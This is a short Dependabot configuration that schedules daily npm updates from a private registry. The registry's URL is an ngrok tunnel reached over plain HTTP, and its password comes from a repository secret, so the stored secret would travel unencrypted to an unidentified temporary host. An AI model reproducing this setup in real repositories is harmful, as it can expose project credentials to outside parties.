version: 2
updates:
  - package-ecosystem: "npm"
    registries:
      - npm-local
    directory: "/"
    schedule:
      interval: "daily"
registries:
  npm-local:
    type: npm-registry
    url:  http://ae54-93-94-216-14.ngrok.io
    username: test
    password: ${{ secrets.pass }}
